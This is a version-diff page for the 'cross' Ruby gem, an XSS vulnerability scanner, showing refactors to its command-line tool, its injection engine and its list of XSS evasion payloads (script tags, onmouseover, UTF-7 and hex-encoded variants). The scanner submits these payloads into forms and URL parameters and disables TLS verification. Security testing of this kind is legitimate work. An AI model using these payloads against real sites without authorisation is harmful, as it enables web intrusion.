RubyGems - cross - Versions diffs - 0.60.0 → 0.70.0 - Mend

cross 0.60.0 → 0.70.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (11) hide show

checksums.yaml CHANGED

@@ -1,7 +1,7 @@
 ---
 SHA1:
-  metadata.gz: 4f1bec8b1ce4f2e496fe86f5d966efb87696b4e9
-  data.tar.gz: 8953c2f3a406c7a3cedbeb6f09395e2ddd7e5c11
+  metadata.gz: 0d64cb7b3b08fc4bb0cd84d9e6397d18f665480f
+  data.tar.gz: 75938bd016b68f625effb11d333591de5c5b4a2a
 SHA512:
-  metadata.gz: acb82a8dbe95bf8c952f2537d03642ec4f6d059202914d93f8509605beb208bf6088fdca447d84934f5d61446b7ad4e8f9b3442ed213091685abade5879c006e
-  data.tar.gz: a159b734f9bb303170e2e922c936c4c89abfe83524f58f2392bee7e0b2e679813c8371d5c01edd46faa615b39e26f4e94cb7b020aa73e0eeba7ac0d1954b8cb6
+  metadata.gz: 20299787fae7dbceff48b0a9ccede33d6e56398846c6957008abce06a529c6b2915b871ac8a7d1b3b5afa1b4248d01e990cbd526db91a92af845ccebaf3dd0c5
+  data.tar.gz: 88e76a3705afb351f0f0bc6fa3c44196056ab3958ee6cb8d68d7d0196f92213837685acfa3570abf59722e6de216be77da917238c8c5308e57e30760437a0bc4

data/.gitignore CHANGED

@@ -1,5 +1,5 @@
 *.swp
-cross.log
+*.log
 *.gem
 *.rbc
 .bundle

data/.ruby-gemset ADDED

	@@ -0,0 +1 @@
1	+ hacking

data/.ruby-version ADDED

	@@ -0,0 +1 @@
1	+ ruby-2.0.0-p247

data/bin/cross CHANGED

@@ -7,6 +7,8 @@ require 'cross'
 require 'getoptlong'
 require 'codesake-commons'
+$logger = Codesake::Commons::Logging.instance
 opts = GetoptLong.new(
   [ '--help', '-h', GetoptLong::NO_ARGUMENT ],
   [ '--version', '-v', GetoptLong::NO_ARGUMENT ],
@@ -19,18 +21,26 @@ opts = GetoptLong.new(
   ['--user', '-U', GetoptLong::REQUIRED_ARGUMENT ],
   ['--password', '-P', GetoptLong::REQUIRED_ARGUMENT ]
 )
-trap("INT") { puts '['+'INTERRUPTED'.color(:red)+']'; exit -1 }
+trap("INT") { $logger.die "SIGINT detected. Giving up" }
-options={:exploit_url=>false, :debug=>false, :oneshot=>false, :sample_post=>"", :parameter_to_tamper=>"", :crawl=>{:enabled=>false, :url_prefix=>nil}, :auth=>{:username=>nil, :password=>nil}}
-$logger = Codesake::Commons::Logging.instance
-$logger.toggle_syslog
+options = {:exploit_url=>false,
+  :debug=>false,
+  :oneshot=>false,
+  :sample_post=>"",
+  :parameter_to_tamper=>"",
+  :auth=>{:username=>nil, :password=>nil},
+  :target=>""
+}
 opts.each do |opt, arg|
   case opt
   when '--help'
-    puts "usage: cross [-uDhv] target"
-    puts "     -u: exploits the URL string instead of looking at the form values"
+    puts "usage: cross [-D1StucUPhv] target"
     puts "     -D: turns debug on"
+    puts "     -1: random select a XSS attack pattern"
+    puts "     -S arg: when tampering posts, arg is a valid POST body used as reference. It can be also a text file containg the POST parameters."
+    puts "     -t arg: tells cross to tamper the given parameter. It must be used with -S flag turned on"
+    puts "     -u: exploits the URL string instead of looking at the form values"
     puts "     -v: shows version"
     puts "     -h: this help"
     exit 0
@@ -49,10 +59,8 @@ opts.each do |opt, arg|
     options[:debug]=true
   when '--exploit-url'
     options[:exploit_url]=true
   when '--crawl'
-    options[:crawl][:enabled]=true
-    options[:crawl][:url_prefix] = arg unless arg.nil?
+    $logger.die "deprecated. codesake-crawler must be used instead"
   when '--user'
     options[:auth][:username]=arg
   when '--password'
@@ -60,30 +68,26 @@ opts.each do |opt, arg|
   end
 end
-$logger.helo "cross " + Cross::VERSION + " is starting up"
+$logger.helo "cross", Cross::VERSION
+$logger.die "missing target" if ARGV.length != 1
+$logger.die "-S and -t flag must be used together" if (options[:sample_post].empty? && ! options[:parameter_to_tamper].empty?) or (! options[:sample_post].empty? && options[:parameter_to_tamper].empty?)
+options[:target] = ARGV.shift
 engine = Cross::Engine.instance
 engine.start(options)
 found = false
-$logger.die "missing target" if ARGV.length != 1
-$logger.die "-S and -t flag must be used together" if (options[:sample_post].empty? && ! options[:parameter_to_tamper].empty?) or (! options[:sample_post].empty? && options[:parameter_to_tamper].empty?)
-if engine.crawl?
-  result = engine.crawl(ARGV.shift)
-  $logger.die result[:message] if result[:status] == 'KO'
-  result[:links].each do |l|
-    $logger.log "Exploiting: #{options[:crawl][:url_prefix]+l}"
+engine.inject
+unless engine.results.empty?
-    found = engine.inject(options[:crawl][:url_prefix]+l)
-    $logger.ok "Canary found in output page. Suspected XSS" if found
-  end
-else
-  found = engine.inject(ARGV.shift)
-  $logger.ok "Canary found in output page. Suspected XSS" if found
+$logger.ok "Canary found in output page. Suspected XSS"
+engine.results.each do |res|
+  $logger.log res[:evidence]
+end
 end
-$logger.err "Canary not found" if ! found
+$logger.err "Canary not found" if engine.results.empty?
 $logger.helo "cross is leaving"

data/lib/cross/engine.rb CHANGED

@@ -1,6 +1,7 @@
 require 'mechanize'
 require 'logger'
 require 'singleton'
+require 'URI'
 require 'cross/xss'
@@ -10,84 +11,75 @@ module Cross
   class Engine
     include Singleton
-    attr_reader :agent
+    attr_reader   :agent
     attr_accessor :options
-    def debug?
-      @options[:debug]
+    attr_reader   :results
+    attr_reader   :target
+    def create_log_filename(target)
+      begin
+        return "cross_#{URI.parse(target).hostname.gsub('.', '_')}_#{Time.now.strftime("%Y%m%d")}.log"
+      rescue
+        return "cross_#{Time.now.strftime("%Y%m%d")}.log"
+      end
     end
     # Starts the engine
-    def start(options={:exploit_url=>false, :debug=>false, :auth=>{}})
-      @agent = Mechanize.new {|a| a.log = Logger.new("cross.log")}
+    def start(options = {:exploit_url=>false, :debug=>false, :oneshot=>false, :sample_post=>"", :parameter_to_tamper=>"", :auth=>{:username=>nil, :password=>nil}, :target=>""})
+      @agent = Mechanize.new {|a| a.log = Logger.new(create_log_filename(options[:target]))}
       @agent.user_agent_alias = 'Mac Safari'
       @agent.agent.http.verify_mode = OpenSSL::SSL::VERIFY_NONE
       @options = options
+      @target = options[:target]
+      @results = {}
     end
-    def authenticate?
-      ! @options[:auth].nil?  and ! @options[:auth].empty?
-    end
-    def crawl?
-      @options[:crawl][:enabled]
-    end
-    def crawl(url)
+    # def crawl(url)
+    #   start if @agent.nil?
+    #   links = []
+    #   @agent.add_auth(url, @options[:auth][:username], @options[:auth][:password]) if authenticate?
+    #   begin
+    #     page=@agent.get(url)
+    #     page=@agent.get(url) if authenticate?
+    #     page.links.each do |l|
+    #       @agent.log.debug("Link found: #{l.href}") if debug?
+    #       links << l.href
+    #     end
+    #   rescue Mechanize::UnauthorizedError
+    #     return {:status=>'KO', :links=>[], :message=>'target website requires authentication'}
+    #   rescue => e
+    #     return {:status=>'KO', :links=>links, :message=>e.to_s}
+    #   end
+    #   return {:status=>'OK', :links=>links, :message=>''}
+    # end
+    def inject
       start if @agent.nil?
-      links = []
-      @agent.add_auth(url, @options[:auth][:username], @options[:auth][:password]) if authenticate?
-      begin
-        page=@agent.get(url)
-        page=@agent.get(url) if authenticate?
-        page.links.each do |l|
-          @agent.log.debug("Link found: #{l.href}") if debug?
-          links << l.href
-        end
-      rescue Mechanize::UnauthorizedError
-        return {:status=>'KO', :links=>[], :message=>'target website requires authentication'}
-      rescue => e
-        return {:status=>'KO', :links=>links, :message=>e.to_s}
-      end
-      return {:status=>'OK', :links=>links, :message=>''}
-    end
-    def inject(url)
-      start if @agent.nil?
+      $logger.log "Authenticating to the app using #{@options[:auth][:username]}:#{@options[:auth][:password]}" if debug? && authenticate?
-      $logger.log "Authenticating to the app using #{@options[:auth][:username]}:#{@options[:auth][:password]}" if debug?
+      @agent.add_auth(@target, @options[:auth][:username], @options[:auth][:password]) if authenticate?
-      @agent.add_auth(url, @options[:auth][:username], @options[:auth][:password]) if authenticate?
-      found = false
       if @options[:exploit_url]
         # You ask to exploit the url, so I won't check for form values
-        attack_url = Cross::Url.new(url)
-        Cross::Attack::XSS.each do |pattern|
-          attack_url.params.each do |par|
-            page = @agent.get(attack_url.fuzz(par[:name],pattern))
-            @agent.log.debug(page.body) if debug?
-            scripts = page.search("//script")
-            scripts.each do |sc|
-              $logger.log(page.body) if @options[:debug] if sc.children.text.include?("alert(#{Cross::Attack::XSS::CANARY})")
-              return true if sc.children.text.include?("alert(#{Cross::Attack::XSS::CANARY})")
-            end
+        theurl= Cross::Url.new(@target)
-            return false if options[:oneshot]
+        attack_url(theurl, Cross::Attack::XSS.rand) if oneshot?
-            attack_url.reset
+        if ! oneshot?
+          Cross::Attack::XSS.each do |pattern|
+            attack_url(theurl, pattern)
           end
         end
       else
         begin
-          page = @agent.get(url)
+          page = @agent.get(@target)
         rescue Mechanize::UnauthorizedError
           $logger.err 'Authentication failed. Giving up.'
           return false
@@ -99,48 +91,112 @@ module Cross
           return false
         end
-        $logger.log "#{page.forms.size} form(s) found" if debug?
-        Cross::Attack::XSS.each do |pattern|
-          $logger.log "using attack vector: #{pattern}" if debug?
-          page.forms.each do |f|
-            f.fields.each do |ff|
-              if  options[:sample_post].empty?
-                ff.value = pattern if options[:parameter_to_tamper].empty?
-                ff.value = pattern if ! options[:parameter_to_tamper].empty? && ff.name==options[:parameter_to_tamper]
-              else
-                ff.value = find_sample_value_for(options[:sample_post], ff.name) unless ff.name==options[:parameter_to_tamper]
-                ff.value = pattern if ff.name==options[:parameter_to_tamper]
-              end
-            end
-            pp = @agent.submit(f)
-            $logger.log "header: #{pp.header}" if debug? && ! pp.header.empty?
-            $logger.log "body: #{pp.body}" if debug? && ! pp.body.empty?
-            $logger.err "Page is empty" if pp.body.empty?
-            scripts = pp.search("//script")
-            scripts.each do |sc|
-              return true if sc.children.text.include?("alert(#{Cross::Attack::XSS::CANARY})")
-            end
-            # This is for input html field javascript event evasion
-            inputs = pp.search("//input")
-            inputs.each do |input|
-              return true if ! input['onmouseover'].nil? && input['onmouseover'].include?("alert(#{Cross::Attack::XSS::CANARY})")
-            end
-          end
-          return false if options[:oneshot]
+        if page.forms.size == 0
+          $logger.log "no forms found, please try to exploit #{@target} with the -u flag"
+          return false
+        else
+          $logger.log "#{page.forms.size} form(s) found" if debug?
+        end
+        attack_form(page, Cross::Attack::XSS.rand) if oneshot?
+        if ! oneshot?
+          Cross::Attack::XSS.each do |pattern|
+            attack_form(page, pattern)
+          end
         end
       end
-      found
+      @results.empty?
     end
     private
+    def oneshot?
+      @options[:oneshot]
+    end
+    def debug?
+      @options[:debug]
+    end
+    def authenticate?
+      ! ( @options[:auth][:username].nil?  &&  @options[:auth][:password].nil? )
+    end
+    def attack_url(url = Cross::Url.new, pattern)
+      $logger.log "using attack vector: #{pattern}" if debug?
+      url.params.each do |par|
+        page = @agent.get(url.fuzz(par[:name],pattern))
+        @agent.log.debug(page.body) if debug?
+        scripts = page.search("//script")
+        scripts.each do |sc|
+          if sc.children.text.include?("alert(#{Cross::Attack::XSS::CANARY})")
+            $logger.log(page.body) if @debug
+            @results << {:page=>page.url, :method=>:get, :evidence=>sc.children.text, :param=>par}
+            return true
+          end
+        end
+        inputs = page.search("//input")
+        inputs.each do |input|
+          if ! input['onmouseover'].nil? && input['onmouseover'].include?("alert(#{Cross::Attack::XSS::CANARY})")
+            $logger.log(page.body) if @debug
+            @results << {:page=>page.url, :method=>:get, :evidence=>input['onmouseover'], :param=>par}
+            return true
+          end
+        end
+        url.reset
+      end
+      false
+    end
+    def attack_form(page = Mechanize::Page.new, pattern)
+      $logger.log "using attack vector: #{pattern}" if debug?
+      page.forms.each do |f|
+        f.fields.each do |ff|
+          if  options[:sample_post].empty?
+            ff.value = pattern if options[:parameter_to_tamper].empty?
+            ff.value = pattern if ! options[:parameter_to_tamper].empty? && ff.name==options[:parameter_to_tamper]
+          else
+            ff.value = find_sample_value_for(options[:sample_post], ff.name) unless ff.name==options[:parameter_to_tamper]
+            ff.value = pattern if ff.name==options[:parameter_to_tamper]
+          end
+        end
+        pp = @agent.submit(f)
+        $logger.log "header: #{pp.header}" if debug? && ! pp.header.empty?
+        $logger.log "body: #{pp.body}" if debug? && ! pp.body.empty?
+        $logger.err "Page is empty" if pp.body.empty?
+        scripts = pp.search("//script")
+        scripts.each do |sc|
+          if sc.children.text.include?("alert(#{Cross::Attack::XSS::CANARY})")
+            $logger.log(page.body) if @debug
+            @results << {:page=>page.url, :method=>:post, :evidence=>sc.children.text}
+            return true
+          end
+        end
+        # This is for input html field javascript event evasion
+        inputs = pp.search("//input")
+        inputs.each do |input|
+          if ! input['onmouseover'].nil? && input['onmouseover'].include?("alert(#{Cross::Attack::XSS::CANARY})")
+            $logger.log(page.body) if @debug
+            @results << {:page=>page.url, :method=>:post, :evidence=> input['onmouseover']}
+            return true
+          end
+        end
+      end
+      false
+    end
     def find_sample_value_for(sample, name)
       v=sample.split('&')
       v.each do |post_param|

data/lib/cross/url.rb CHANGED

@@ -11,17 +11,19 @@ module Cross
       @params = []
       @original_params = []
       @base_url = url.split('?')[0]
-      p_array = url.split('?')[1].split('&')
-      p_array.each do |p|
-        pp = p.split('=')
-        param = {}
-        param[:name] = pp[0]
-        param[:value] = pp[1] unless pp[1].nil?
+      if has_params?
+        p_array = url.split('?')[1].split('&')
+        p_array.each do |p|
+          pp = p.split('=')
+          param = {}
+          param[:name] = pp[0]
+          param[:value] = pp[1] unless pp[1].nil?
-        @params << param
-        @original_params  << param.dup
+          @params << param
+          @original_params  << param.dup
+        end
+        @original_params.freeze
       end
-      @original_params.freeze
     end
     def to_s
@@ -54,6 +56,9 @@ module Cross
       end
     end
+    def has_params?
+      ! @url.split('?')[1].nil?
+    end
     def params_to_url
       ret = ""
       @params.each do |p|

data/lib/cross/version.rb CHANGED

@@ -1,3 +1,3 @@
 module Cross
-  VERSION = "0.60.0"
+  VERSION = "0.70.0"
 end

data/lib/cross/xss.rb CHANGED

@@ -1,12 +1,11 @@
+require 'securerandom'
 module Cross
   module Attack
     class XSS
       CANARY = 666
-      def self.each
-        evasions = [
+      EVASIONS = [
           "a onmouseover=alert(#{Cross::Attack::XSS::CANARY})",
           "<script>alert(#{Cross::Attack::XSS::CANARY})</script>",
           "<script>alert(#{Cross::Attack::XSS::CANARY});</script>",
@@ -67,11 +66,17 @@ module Cross
           "+ADw-script+AD4-alert(#{Cross::Attack::XSS::CANARY})+ADw-/script+AD4-", # UTF-7
           "},alert(#{Cross::Attack::XSS::CANARY}),function x(){//", # DOM breaker
           "\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3ealert(#{Cross::Attack::XSS::CANARY})\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e" #DOM-based innerHTML injection
-        ]
-        evasions.each do |pattern|
+      ]
+      def self.rand
+        Cross::Attack::XSS::EVASIONS[SecureRandom.random_number(Cross::Attack::XSS::EVASIONS.size)]
+      end
+      def self.each
+        Cross::Attack::XSS::EVASIONS.each do |pattern|
           yield pattern if block_given?
         end
       end
     end

metadata CHANGED

@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: cross
 version: !ruby/object:Gem::Version
-  version: 0.60.0
+  version: 0.70.0
 platform: ruby
 authors:
 - Paolo Perego
 autorequire:
 bindir: bin
 cert_chain: []
-date: 2013-10-11 00:00:00.000000000 Z
+date: 2013-10-17 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: rake
@@ -119,7 +119,8 @@ files:
 - .document
 - .gitignore
 - .rspec
-- .rvmrc
+- .ruby-gemset
+- .ruby-version
 - Gemfile
 - LICENSE
 - README.rdoc

data/.rvmrc DELETED

	@@ -1,2 +0,0 @@
1	- rvm use 1.9.3@cross
2	-